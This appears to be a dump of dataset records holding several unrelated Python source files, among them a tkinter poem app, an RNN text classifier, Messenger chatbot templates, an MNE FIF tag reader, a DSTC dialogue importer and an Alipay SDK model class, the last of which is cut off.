borderwidth=2, relief=\"groove\")\n self.add_poem_btm.grid(row=1, padx=15, sticky='W')\n\n self.remove_poem_btn = Button(self.root, text=\"Remove poem\", command=self.remove_btn,\n borderwidth=2, relief=\"groove\")\n self.remove_poem_btn.grid(row=2, padx=15, sticky='W')\n\n def page(self, index):\n names = self.poem_names()\n\n self.root.title(names[index])\n\n self.page_lbl = Label(self.root, text=names[index], font=\"helvetica 15\")\n self.page_lbl.pack()\n\n text = self.poem_text(index + 1)\n\n self.geometry_controll(500, self.count_lines(text) / 2)\n\n self.page_text = Label(self.root, text=text, font=\"helvetica 11\")\n self.page_text.pack()\n\n\n self.page_button = Button(self.root, text=\"Back to menu <<<\", command=self.page_btn_cmd,\n borderwidth=2, relief=\"groove\")\n self.page_button.pack(side=BOTTOM, pady=15)\n\n def add_poem(self):\n self.root.title(\"Add poem\")\n\n self.add_lbl = Label(self.root, text=\"Add poem\", font=\"helvetica 15\")\n self.add_lbl.grid(row=0, padx=10, pady=10)\n\n self.add_lbl_name = Label(self.root, text=\"Poem name\", font=\"helvetica 10\")\n self.add_lbl_name.grid(row=1, pady=10, padx=10, sticky='NW')\n\n self.add_entry = Entry(self.root, width=67, borderwidth=2, relief=\"groove\")\n self.add_entry.grid(row=1, column=1, sticky='W')\n\n self.add_lbl_text = Label(self.root, text=\"Poem text\", font=\"helvetica 10\")\n self.add_lbl_text.grid(row=2, padx=10, pady=10, sticky='NW')\n\n self.add_scroll = Scrollbar(self.root)\n self.add_text = Text(self.root, height=16, width=50, borderwidth=2, relief=\"groove\")\n self.add_text.grid(row=2, column=1, pady=10, sticky='W')\n self.add_scroll.grid(row=2, column=1, sticky='E')\n self.add_scroll.config(command=self.add_text.yview)\n self.add_text.config(yscrollcommand=self.add_scroll.set)\n\n self.add_btm = Button(self.root, text=\"Add poem\", command=self.add_btm_cmd, borderwidth=2, relief=\"groove\")\n self.add_btm.grid(row=3, column=1, pady=10, sticky='E')\n\n self.add_btm_back = Button(self.root, text=\"Back to menu\", command=self.add_back_cmd,\n borderwidth=2, relief=\"groove\")\n self.add_btm_back.grid(row=4, column=1, pady=10, sticky='E')\n\n self.root.geometry(\"540x470\")\n\n def remove_poem(self):\n self.root.title(\"Remove poem\")\n\n self.remove_frame = Frame(self.root)\n self.remove_frame.grid()\n\n self.del_main_lbl = Label(self.remove_frame, text=\"Remove:\", font=\"helvetica 15\")\n self.del_main_lbl.grid(row=0, pady=10, padx=10, sticky='W')\n\n text = 'Select which poem \\nyou want to delete:'\n\n del_lbl_info = Label(self.remove_frame, text=text)\n del_lbl_info.grid(row=1, padx=10)\n\n del_back_btn = Button(self.remove_frame, text=\"Back to menu\", borderwidth=2, relief=\"groove\",\n command=self.del_back_cmd)\n del_back_btn.grid(row=2, padx=10, sticky='W')\n\n poem_name = self.poem_names()\n\n self.geometry_controll(400, len(poem_name)) # Добавление пространства эквивалентно количеству пунктов меню\n\n for i in range(len(poem_name)):\n b = Button(self.remove_frame, text=poem_name[i], command=lambda j=i: self.del_poem_cmd(j),\n borderwidth=2, relief=\"groove\")\n b.grid(row=i, column=1, padx=10, pady=10, sticky='W')\n self.btns.append(b)\n\n # -------------------------------- Help functions --------------------------------\n\n def geometry_controll(self, x, y):\n space = y * 35 + 100\n self.root.geometry('%dx%d' % (x, space))\n pass\n\n def count_lines(self, str):\n lines = re.findall('\\n', str)\n count = 0\n for _ in lines:\n count += 1\n return count\n\n def count_poems(self):\n counter = 0\n way = os.getcwd() + '\\\\poems\\\\*'\n url = glob.glob(way)\n for i in url:\n counter += 1\n return counter\n\n def poem_names(self):\n result = []\n way = os.getcwd() + '\\\\poems\\\\'\n url = glob.glob(way+'\\\\*')\n for i in url:\n f = open(i, 'r')\n str = f.read()\n find = re.findall(r'(?<=)(.*)(?=)', str)\n result.append(find[0])\n f.close()\n return result\n\n def poem_text(self, index):\n way = os.getcwd() + '\\\\poems\\\\'\n url = glob.glob(way+'poem_%d.txt' % index)\n f = open(url[0], 'r')\n str = f.read()\n find = re.findall(r'(.*)', str, flags=re.DOTALL)\n result = find[0]\n f.close()\n return result\n\n # -------------------------------- Help for commands --------------------------------\n\n def remove_menu_w(self):\n self.menu_lbl.grid_forget()\n for i in range(len(self.btns)):\n self.btns[i].grid_forget()\n self.add_poem_btm.grid_forget()\n self.remove_poem_btn.grid_forget()\n\n def remove_page_w(self):\n self.page_text.pack_forget()\n self.page_lbl.pack_forget()\n self.page_button.pack_forget()\n\n def remove_add_w(self):\n self.add_entry.grid_forget()\n self.add_text.grid_forget()\n self.add_lbl_text.grid_forget()\n self.add_btm.grid_forget()\n self.add_scroll.grid_forget()\n self.add_lbl_name.grid_forget()\n self.add_lbl.grid_forget()\n self.add_btm_back.grid_forget()\n\n # -------------------------------- Button commands --------------------------------\n\n def choice_poem(self, index):\n self.remove_menu_w()\n self.page(index)\n\n def page_btn_cmd(self):\n self.remove_page_w()\n self.menu()\n\n def add_poem_cmd(self):\n self.remove_menu_w()\n self.add_poem()\n\n def add_btm_cmd(self):\n name = self.add_entry.get()\n text = self.add_text.get(\"1.0\", END)\n empty = re.match('^[A-Za-z0-9_-]*', text)\n if name == \"\" or empty.group() == \"\":\n messagebox.showinfo(\"Error!\", \"Enter title of poem and text poem!\") # Момент под вопросом, так как\n else: # поиск выдает результат построчно\n count = self.count_poems() # и получаются несколько лишних \"\"\n file_name = 'poems\\\\poem_' + str(count + 1) + '.txt'\n\n result = \"\" + str(name) + \"\" + \"\\n\\n\"\n result += \"\" + text + \"\"\n\n f = open(file_name, 'w')\n f.write(result)\n f.close()\n\n self.remove_add_w()\n\n self.menu()\n\n def add_back_cmd(self):\n self.remove_add_w()\n self.menu()\n\n def remove_btn(self):\n self.remove_menu_w()\n self.remove_poem()\n\n def del_poem_cmd(self, i):\n self.remove_frame.grid_forget()\n self.menu()\n\n def del_back_cmd(self):\n self.remove_frame.grid_forget()\n self.menu()\n\n# -------------------------------- End of class --------------------------------\n\ndef main():\n root = Tk()\n Application(root)\n root.mainloop()\n\nif __name__ == '__main__':\n main()","sub_path":"project14_poem_application_v_1_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"469869181","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nOpen the Consumer Price Index (CPI) dataset.\n\"\"\"\nimport os\nimport csv\n\n\ndef _get_cpi_dict():\n \"\"\"\n Returns a dictionary of the CPI-U adjustment value for each year available.\n \"\"\"\n # Open up the CSV from the BLS\n this_dir = os.path.dirname(__file__)\n csv_path = os.path.join(this_dir, 'data.csv')\n csv_file = open(csv_path, \"r\")\n csv_data = csv.DictReader(csv_file)\n\n # Convert it into a dictionary and pass it out.\n return dict(\n (int(r['year']), float(r['value'])) for r in csv_data\n )\n\n\ncpi_by_year = _get_cpi_dict()\n","sub_path":"cpi/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"606881337","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n \n import time\n\n dict = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n t0 = time.time()\n numbers = [dict[i] for i in s]\n t1 = time.time()\n print(f\"map to values takes {t1-t0} secs\")\n #ind = [x-y for x,y in zip(numbers[:-1],numbers[1:])]\n ind = [-1 if numbers[i+1] - numbers[i] < 0 else 1 for i in range(len(s)-1)] +[1]\n t2 = time.time()\n print(f\"check increment/decrement takes {t2-t1} secs\")\n #ind = [-1 if i < 0 else 1 for i in ind] + [1]\n t3 = time.time()\n print(f\"convert change to digital takes {t3-t2} secs\")\n summation = [i*j for i,j in zip(numbers, ind)]\n t4 = time.time()\n print(f\"zip takes {t4-t3} secs\")\n return sum(summation)\n\n\nif __name__ == '__main__':\n sol = Solution()\n #strings = ['IV','III','IX','MCMXCIV']\n strings = ['MCMXCIV']\n for s in strings:\n print(sol.romanToInt(s))\n \n","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345752065","text":"\"\"\"\nDavid Rubio Vallejo\n\nImplements an RNN with an embedding layer consisting of the word vectors for the input words, the recurrent RNN layer,\n and an output layer mapping into a single neuron.\n\nAn RNN model in Gluon is represented as a triple (S, N, W), where\nS = Length of the sequence\nN = Batch size\nW = Length of each word-vector for a token in a sentence.\n\"\"\"\n\nimport mxnet.gluon as gluon\nfrom mxnet.gluon import HybridBlock\nfrom mxnet.ndarray import squeeze, swapaxes\n\n\nclass RNNTextClassifier(HybridBlock):\n\n def __init__(self, emb_input_dim, emb_output_dim, num_classes=1, prefix=None, params=None):\n super(RNNTextClassifier, self).__init__(prefix=prefix, params=params)\n\n with self.name_scope():\n\n self.embedding = gluon.nn.Embedding(emb_input_dim, emb_output_dim)\n\n self.rnn = gluon.rnn.RNN(hidden_size=100)\n self.activation1 = gluon.nn.Dropout(0.2)\n self.out = gluon.nn.Dense(num_classes)\n\n def hybrid_forward(self, F, data):\n # data.shape is a triple of (16, 1, 64). Need to eliminate that redundant second dimension and transpose it\n # before attaching the embeddings\n data = squeeze(data)\n data = data.T\n embedded = self.embedding(data)\n\n x = self.rnn(embedded)\n x - self.activation1(x)\n\n # Swap the first and second axes to bring it from (length, batch size, width) to (batch size, length, width),\n # before passing it to the outer layer (only recurrent layers use the first ordering).\n x = swapaxes(x, 0, 1)\n\n x = self.out(x)\n\n return x","sub_path":"RNN_model.py","file_name":"RNN_model.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"433433441","text":"# import json\ndef GenericTemplate(template_items:list):\n message_str = {\n \"attachment\": {\n \"type\": \"template\",\n \"payload\": {\n \"template_type\": \"generic\",\n \"elements\": template_items\n\n }\n }\n }\n return message_str\ndef ButtonPostbackTemplate(btn_tittle:str,btn_payload:str):\n button = {\n \"type\":\"postback\",\n \"title\":btn_tittle,\n \"payload\":btn_payload\n }\n return button\ndef ItemsTemplate(title:str,url_img:str,subtitle:str,list_button:list):\n template_item = {\n \"title\": title,\n \"image_url\": url_img,\n \"subtitle\": subtitle,\n \"default_action\": {\n \"type\": \"web_url\",\n \"url\": url_img,\n \"webview_height_ratio\": \"full\"\n },\n \"buttons\": list_button\n }\n\n return template_item\n\ndef HardwareAnswer(name:str,TypeQ:str,answer:str):\n template = {'YorN':{\"yes\":\"Máy có {} ạ.\".format(name),\"no\":\"Sản phẩm không có {} ạ\".format(name)},\n 'WHQ':{\"yes\":\"Máy sử dụng {} ạ.\".format(name),\"no\":\"Sản phẩm không có {} ạ\".format(name)}}\n result = template[TypeQ][answer]\n return result\n\ndef PersistentMenu(list_button:list):\n message_str = {\"persistent_menu\": [\n {\n \"locale\": \"default\",\n \"composer_input_disabled\": \"false\",\n \"call_to_actions\": list_button\n }\n ]}\n return message_str\n\ndef QuickReply(temp:str,danhsach:str):\n data = {'action_product_configuration':'Cấu hình','action_promotions_and_gift':'Khuyến mãi','action_guarantee':'Bảo hành','action_option_in_box':'Phụ kiện trong hộp','action_is_product_can_buy_on_installment':'Trả góp được không','action_take_photo_erase_background':'Chụp ảnh xóa phông','action_waterproof':'Có chống nước không'}\n listitem = []\n data.pop(temp)\n for item in data:\n btn = {\"content_type\": \"text\",\n \"title\": data.__getitem__(item),\n \"payload\": data.__getitem__(item)}\n listitem.append(btn)\n if danhsach:\n tmp = {\"content_type\": \"text\",\n \"title\": \"Quay lại danh sách\",\n \"payload\": danhsach}\n listitem.append(tmp)\n message = {\n \"text\": \"Thông tin khác\",\n \"quick_replies\": listitem}\n return message\n\ndef BackToList(temp:str):\n message = {\"text\": \"Thông tin khác\",\n \"quick_replies\":[{\"content_type\": \"text\",\n \"title\": \"Quay lại danh sách\",\n \"payload\": temp}]\n }\n return message\ndef UrlButton(url:str):\n message_str = {\n \"type\": \"web_url\",\n \"url\": url,\n \"title\": \"Trả góp\",\n \"webview_height_ratio\": \"full\"\n }\n return message_str","sub_path":"CreateJsonMessageTemplate.py","file_name":"CreateJsonMessageTemplate.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403087638","text":"# Authors: Alexandre Gramfort \n# Matti Hamalainen \n#\n# License: BSD (3-clause)\n\nimport struct\nimport numpy as np\n\nfrom .bunch import Bunch\nfrom .constants import FIFF\n\n\nclass Tag(object):\n \"\"\"Tag in FIF tree structure\n\n Parameters\n ----------\n kind: int\n Kind of Tag\n\n type_: int\n Type of Tag\n\n size: int\n Size in bytes\n\n int: next\n Position of next Tag\n\n pos: int\n Position of Tag is the original file.\n\n \"\"\"\n\n def __init__(self, kind, type_, size, next, pos=None):\n self.kind = int(kind)\n self.type = int(type_)\n self.size = int(size)\n self.next = int(next)\n self.pos = pos if pos is not None else next\n self.pos = int(self.pos)\n self.data = None\n\n def __repr__(self):\n out = \"kind: %s - type: %s - size: %s - next: %s - pos: %s\" % (\n self.kind, self.type, self.size, self.next, self.pos)\n if hasattr(self, 'data'):\n out += \" - data: %s\" % self.data\n out += \"\\n\"\n return out\n\n def __cmp__(self, tag):\n is_equal = (self.kind == tag.kind and\n self.type == tag.type and\n self.size == tag.size and\n self.next == tag.next and\n self.pos == tag.pos and\n self.data == tag.data)\n if is_equal:\n return 0\n else:\n return 1\n\n\ndef read_tag_info(fid):\n \"\"\"Read Tag info (or header)\n \"\"\"\n s = fid.read(4 * 4)\n tag = Tag(*struct.unpack(\">iiii\", s))\n if tag.next == 0:\n fid.seek(tag.size, 1)\n elif tag.next > 0:\n fid.seek(tag.next, 0)\n return tag\n\n\ndef read_tag(fid, pos=None):\n \"\"\"Read a Tag from a file at a given position\n\n Parameters\n ----------\n fid: file\n The open FIF file descriptor\n\n pos: int\n The position of the Tag in the file.\n\n Returns\n -------\n tag: Tag\n The Tag read\n \"\"\"\n if pos is not None:\n fid.seek(pos, 0)\n\n s = fid.read(4 * 4)\n tag = Tag(*struct.unpack(\">iIii\", s))\n\n #\n # The magic hexadecimal values\n #\n is_matrix = 4294901760 # ffff0000\n matrix_coding_dense = 16384 # 4000\n matrix_coding_CCS = 16400 # 4010\n matrix_coding_RCS = 16416 # 4020\n data_type = 65535 # ffff\n #\n if tag.size > 0:\n matrix_coding = is_matrix & tag.type\n if matrix_coding != 0:\n matrix_coding = matrix_coding >> 16\n\n # Matrices\n if matrix_coding == matrix_coding_dense:\n # Find dimensions and return to the beginning of tag data\n pos = fid.tell()\n fid.seek(tag.size - 4, 1)\n ndim = np.fromfile(fid, dtype='>i', count=1)\n fid.seek(-(ndim + 1) * 4, 1)\n dims = np.fromfile(fid, dtype='>i', count=ndim)[::-1]\n #\n # Back to where the data start\n #\n fid.seek(pos, 0)\n\n if ndim != 2:\n raise ValueError('Only two-dimensional matrices are '\n 'supported at this time')\n\n matrix_type = data_type & tag.type\n\n if matrix_type == FIFF.FIFFT_INT:\n tag.data = np.fromfile(fid, dtype='>i',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_JULIAN:\n tag.data = np.fromfile(fid, dtype='>i',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_FLOAT:\n tag.data = np.fromfile(fid, dtype='>f4',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_DOUBLE:\n tag.data = np.fromfile(fid, dtype='>f8',\n count=dims.prod()).reshape(dims)\n elif matrix_type == FIFF.FIFFT_COMPLEX_FLOAT:\n data = np.fromfile(fid, dtype='>f4', count=2 * dims.prod())\n # Note: we need the non-conjugate transpose here\n tag.data = (data[::2] + 1j * data[1::2]).reshape(dims)\n elif matrix_type == FIFF.FIFFT_COMPLEX_DOUBLE:\n data = np.fromfile(fid, dtype='>f8', count=2 * dims.prod())\n # Note: we need the non-conjugate transpose here\n tag.data = (data[::2] + 1j * data[1::2]).reshape(dims)\n else:\n raise ValueError('Cannot handle matrix of type %d yet' %\n matrix_type)\n\n elif matrix_coding == matrix_coding_CCS or \\\n matrix_coding == matrix_coding_RCS:\n from scipy import sparse\n # Find dimensions and return to the beginning of tag data\n pos = fid.tell()\n fid.seek(tag.size - 4, 1)\n ndim = int(np.fromfile(fid, dtype='>i', count=1))\n fid.seek(-(ndim + 2) * 4, 1)\n dims = np.fromfile(fid, dtype='>i', count=ndim + 1)\n if ndim != 2:\n raise ValueError('Only two-dimensional matrices are '\n 'supported at this time')\n\n # Back to where the data start\n fid.seek(pos, 0)\n nnz = dims[0]\n nrow = dims[1]\n ncol = dims[2]\n sparse_data = np.fromfile(fid, dtype='>f4', count=nnz)\n shape = (dims[1], dims[2])\n if matrix_coding == matrix_coding_CCS:\n # CCS\n sparse.csc_matrix()\n sparse_indices = np.fromfile(fid, dtype='>i4', count=nnz)\n sparse_ptrs = np.fromfile(fid, dtype='>i4', count=ncol + 1)\n tag.data = sparse.csc_matrix((sparse_data, sparse_indices,\n sparse_ptrs), shape=shape)\n else:\n # RCS\n sparse_indices = np.fromfile(fid, dtype='>i4', count=nnz)\n sparse_ptrs = np.fromfile(fid, dtype='>i4', count=nrow + 1)\n tag.data = sparse.csr_matrix((sparse_data, sparse_indices,\n sparse_ptrs), shape=shape)\n else:\n raise ValueError('Cannot handle other than dense or sparse '\n 'matrices yet')\n else:\n # All other data types\n\n # Simple types\n if tag.type == FIFF.FIFFT_BYTE:\n tag.data = np.fromfile(fid, dtype=\">B1\", count=tag.size)\n elif tag.type == FIFF.FIFFT_SHORT:\n tag.data = np.fromfile(fid, dtype=\">h2\", count=tag.size / 2)\n elif tag.type == FIFF.FIFFT_INT:\n tag.data = np.fromfile(fid, dtype=\">i4\", count=tag.size / 4)\n elif tag.type == FIFF.FIFFT_USHORT:\n tag.data = np.fromfile(fid, dtype=\">H2\", count=tag.size / 2)\n elif tag.type == FIFF.FIFFT_UINT:\n tag.data = np.fromfile(fid, dtype=\">I4\", count=tag.size / 4)\n elif tag.type == FIFF.FIFFT_FLOAT:\n tag.data = np.fromfile(fid, dtype=\">f4\", count=tag.size / 4)\n elif tag.type == FIFF.FIFFT_DOUBLE:\n tag.data = np.fromfile(fid, dtype=\">f8\", count=tag.size / 8)\n elif tag.type == FIFF.FIFFT_STRING:\n tag.data = np.fromfile(fid, dtype=\">c\", count=tag.size)\n tag.data = ''.join(tag.data)\n elif tag.type == FIFF.FIFFT_DAU_PACK16:\n tag.data = np.fromfile(fid, dtype=\">h2\", count=tag.size / 2)\n elif tag.type == FIFF.FIFFT_COMPLEX_FLOAT:\n tag.data = np.fromfile(fid, dtype=\">f4\", count=tag.size / 4)\n tag.data = tag.data[::2] + 1j * tag.data[1::2]\n elif tag.type == FIFF.FIFFT_COMPLEX_DOUBLE:\n tag.data = np.fromfile(fid, dtype=\">f8\", count=tag.size / 8)\n tag.data = tag.data[::2] + 1j * tag.data[1::2]\n #\n # Structures\n #\n elif tag.type == FIFF.FIFFT_ID_STRUCT:\n tag.data = dict()\n tag.data['version'] = int(np.fromfile(fid, dtype=\">i4\",\n count=1))\n tag.data['version'] = int(np.fromfile(fid, dtype=\">i4\",\n count=1))\n tag.data['machid'] = np.fromfile(fid, dtype=\">i4\", count=2)\n tag.data['secs'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['usecs'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n elif tag.type == FIFF.FIFFT_DIG_POINT_STRUCT:\n tag.data = dict()\n tag.data['kind'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['ident'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['r'] = np.fromfile(fid, dtype=\">i4\", count=3)\n tag.data['coord_frame'] = 0\n elif tag.type == FIFF.FIFFT_COORD_TRANS_STRUCT:\n tag.data = Bunch()\n tag.data['from'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['to'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n rot = np.fromfile(fid, dtype=\">f4\", count=9).reshape(3, 3)\n move = np.fromfile(fid, dtype=\">f4\", count=3)\n tag.data['trans'] = np.r_[np.c_[rot, move],\n np.array([[0], [0], [0], [1]]).T]\n #\n # Skip over the inverse transformation\n # It is easier to just use inverse of trans in Matlab\n #\n fid.seek(12 * 4, 1)\n elif tag.type == FIFF.FIFFT_CH_INFO_STRUCT:\n d = Bunch()\n d['scanno'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n d['logno'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n d['kind'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n d['range'] = float(np.fromfile(fid, dtype=\">f4\", count=1))\n d['cal'] = float(np.fromfile(fid, dtype=\">f4\", count=1))\n d['coil_type'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n #\n # Read the coil coordinate system definition\n #\n d['loc'] = np.fromfile(fid, dtype=\">f4\", count=12)\n d['coil_trans'] = None\n d['eeg_loc'] = None\n d['coord_frame'] = FIFF.FIFFV_COORD_UNKNOWN\n tag.data = d\n #\n # Convert loc into a more useful format\n #\n loc = tag.data.loc\n kind = tag.data.kind\n if kind == FIFF.FIFFV_MEG_CH or kind == FIFF.FIFFV_REF_MEG_CH:\n tag.data.coil_trans = np.r_[np.c_[loc[3:5], loc[6:8],\n loc[9:11], loc[0:2]],\n np.array([0, 0, 0, 1]).reshape(1, 4)]\n tag.data.coord_frame = FIFF.FIFFV_COORD_DEVICE\n elif tag.data.kind == FIFF.FIFFV_EEG_CH:\n if np.linalg.norm(loc[3:5]) > 0:\n tag.data.eeg_loc = np.c_[loc[0:2], loc[3:5]]\n else:\n tag.data.eeg_loc = loc[1:3]\n tag.data.coord_frame = FIFF.FIFFV_COORD_HEAD\n #\n # Unit and exponent\n #\n tag.data['unit'] = int(np.fromfile(fid, dtype=\">i4\", count=1))\n tag.data['unit_mul'] = int(np.fromfile(fid, dtype=\">i4\",\n count=1))\n #\n # Handle the channel name\n #\n ch_name = np.fromfile(fid, dtype=\">c\", count=16)\n #\n # Omit nulls\n #\n tag.data['ch_name'] = ''.join(\n ch_name[:np.where(ch_name == '')[0][0]])\n\n elif tag.type == FIFF.FIFFT_OLD_PACK:\n offset = float(np.fromfile(fid, dtype=\">f4\", count=1))\n scale = float(np.fromfile(fid, dtype=\">f4\", count=1))\n tag.data = np.fromfile(fid, dtype=\">h2\",\n count=(tag.size - 8) / 2)\n tag.data = scale * tag.data + offset\n elif tag.type == FIFF.FIFFT_DIR_ENTRY_STRUCT:\n tag.data = list()\n for _ in range(tag.size / 16 - 1):\n s = fid.read(4 * 4)\n tag.data.append(Tag(*struct.unpack(\">iIii\", s)))\n else:\n raise ValueError('Unimplemented tag data type %s' % tag.type)\n\n if tag.next != FIFF.FIFFV_NEXT_SEQ:\n # f.seek(tag.next,0)\n fid.seek(tag.next, 1) # XXX : fix? pb when tag.next < 0\n\n return tag\n\n\ndef find_tag(fid, node, findkind):\n \"\"\"Find Tag in an open FIF file descriptor\n \"\"\"\n for p in range(node.nent):\n if node.directory[p].kind == findkind:\n return read_tag(fid, node.directory[p].pos)\n tag = None\n return tag\n\n\ndef has_tag(node, kind):\n \"\"\"Does the node contains a Tag of a given kind?\n \"\"\"\n for d in node.directory:\n if d.kind == kind:\n return True\n return False\n","sub_path":"mne/fiff/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":13704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532575436","text":"import argparse\nimport os\nimport collections\n\nimport dstc_util\nfrom xtrack2_config import dstc45_ontology_filename\nfrom data_model import Dialog\n\nfrom dstc5_scripts import ontology_reader\n\nONTOLOGY = {}\n\n'''\ndef build_unified_ontology(in_ontology_reader):\n merged_ontology = collections.defaultdict(lambda: set([]))\n ontologies = in_ontology_reader.get_tagsets()\n for topic_name, topic_ontology in ontologies.iteritems():\n for slot, slot_values in topic_ontology.iteritems():\n merged_ontology[slot].update(slot_values)\n result = {\n slot_name: list(slot_values)\n for slot_name, slot_values in merged_ontology.iteritems()\n }\n return result\n'''\n\n\ndef build_ontology_for_topic(in_ontology_reader, in_topic):\n result_ontology = collections.defaultdict(lambda: set([]))\n for slot, slot_values in in_ontology_reader.tagsets[in_topic].items():\n result_ontology[slot].update(slot_values)\n result = {\n slot_name: list(slot_values)\n for slot_name, slot_values in result_ontology.iteritems()\n }\n return result\n\n\ndef _stringify_act(in_slots_map):\n res = []\n for slot in in_slots_map:\n res.append(slot['name'])\n for name, value in slot['attrs'].iteritems():\n res.append(name.replace(' ', '_'))\n res.append(value.replace(' ', '_'))\n if len(res) == 0:\n res = [\"sys\"]\n return \" \".join(res)\n\n\ndef import_dstc(data_dir, out_dir, flist, use_stringified_system_acts):\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n dialog_dirs = []\n with open(flist) as f_in:\n for f_name in f_in:\n name = f_name.strip()\n if not name:\n continue\n dialog_dirs.append(os.path.join(data_dir, name))\n\n for i, dialog_dir in enumerate(dialog_dirs):\n dialog = dstc_util.parse_dialog_from_directory(dialog_dir)\n\n out_dialog = Dialog(dialog_dir, dialog.session_id)\n for utterance in dialog.utterances:\n state = dict(utterance.dialog_state)\n if use_stringified_system_acts:\n msg = _stringify_act(utterance.slots_map)\n else:\n msg = utterance.transcript\n actor_id = Dialog.ACTORS_MAP[utterance.speaker]\n out_dialog.add_message(\n [(msg, 1.0)],\n state,\n actor_id,\n utterance.segment_topic,\n utterance.segment_bio\n )\n\n with open(os.path.join(out_dir, \"%d.json\" % (i,)), \"w\") as f_out:\n f_out.write(out_dialog.serialize())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Import DSTC5 data to XTrack2.\"\n )\n parser.add_argument(\n '--data_dir',\n required=True,\n help=\"Root directory with logs.\"\n )\n parser.add_argument(\n '--flist',\n required=True,\n help=\"File list with logs.\"\n )\n parser.add_argument(\n '--out_dir',\n required=True,\n help=\"Output directory.\"\n )\n parser.add_argument(\n '--use_stringified_system_acts',\n action='store_true',\n default=False\n )\n args = parser.parse_args()\n ONTOLOGY = build_unified_ontology(\n ontology_reader.OntologyReader(dstc45_ontology_filename)\n )\n import_dstc(**vars(args))\n","sub_path":"import_dstc45.py","file_name":"import_dstc45.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297703467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\nfrom alipay.aop.api.domain.ParkingOrderPromo import ParkingOrderPromo\n\n\nclass AlipayEcoMycarParkingPayApplyModel(object):\n\n def __init__(self):\n self._in_time = None\n self._out_order_no = None\n self._out_serial_no = None\n self._out_time = None\n self._parking_id = None\n self._pay_scene = None\n self._plate_color = None\n self._plate_no = None\n self._promo = None\n self._seller_id = None\n self._serial_no = None\n self._subject = None\n self._total_amount = None\n\n @property\n def in_time(self):\n return self._in_time\n\n @in_time.setter\n def in_time(self, value):\n self._in_time = value\n @property\n def out_order_no(self):\n return self._out_order_no\n\n @out_order_no.setter\n def out_order_no(self, value):\n self._out_order_no = value\n @property\n def out_serial_no(self):\n return self._out_serial_no\n\n @out_serial_no.setter\n def out_serial_no(self, value):\n self._out_serial_no = value\n @property\n def out_time(self):\n return self._out_time\n\n @out_time.setter\n def out_time(self, value):\n self._out_time = value\n @property\n def parking_id(self):\n return self._parking_id\n\n @parking_id.setter\n def parking_id(self, value):\n self._parking_id = value\n @property\n def pay_scene(self):\n return self._pay_scene\n\n @pay_scene.setter\n def pay_scene(self, value):\n self._pay_scene = value\n @property\n def plate_color(self):\n return self._plate_color\n\n @plate_color.setter\n def plate_color(self, value):\n self._plate_color = value\n @property\n def plate_no(self):\n return self._plate_no\n\n @plate_no.setter\n def plate_no(self, value):\n self._plate_no = value\n @property\n def promo(self):\n return self._promo\n\n @promo.setter\n def promo(self, value):\n if isinstance(value, ParkingOrderPromo):\n self._promo = value\n else:\n self._promo = ParkingOrderPromo.from_alipay_dict(value)\n @property\n def seller_id(self):\n return self._seller_id\n\n @seller_id.setter\n def seller_id(self, value):\n self._seller_id = value\n @property\n def serial_no(self):\n return self._serial_no\n\n @serial_no.setter\n def serial_no(self, value):\n self._serial_no = value\n @property\n def subject(self):\n return self._subject\n\n @subject.setter\n def subject(self, value):\n self._subject = value\n @property\n def total_amount(self):\n return self._total_amount\n\n @total_amount.setter\n def total_amount(self, value):\n self._total_amount = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.in_time:\n if hasattr(self.in_time, 'to_alipay_dict'):\n params['in_time'] = self.in_time.to_alipay_dict()\n else:\n params['in_time'] = self.in_time\n if self.out_order_no:\n if hasattr(self.out_order_no, 'to_alipay_dict'):\n params['out_order_no'] = self.out_order_no.to_alipay_dict()\n else:\n params['out_order_no'] = self.out_order_no\n if self.out_serial_no:\n if hasattr(self.out_serial_no, 'to_alipay_dict'):\n params['out_serial_no'] = self.out_serial_no.to_alipay_dict()\n else:\n params['out_serial_no'] = self.out_serial_no\n if self.out_time:\n if hasattr(self.out_time, 'to_alipay_dict'):\n params['out_time'] = self.out_time.to_alipay_dict()\n else:\n params['out_time'] = self.out_time\n if self.parking_id:\n if hasattr(self.parking_id, 'to_alipay_dict'):\n params['parking_id'] = self.parking_id.to_alipay_dict()\n else:\n params['parking_id'] = self.parking_id\n if self.pay_scene:\n if hasattr(self.pay_scene, 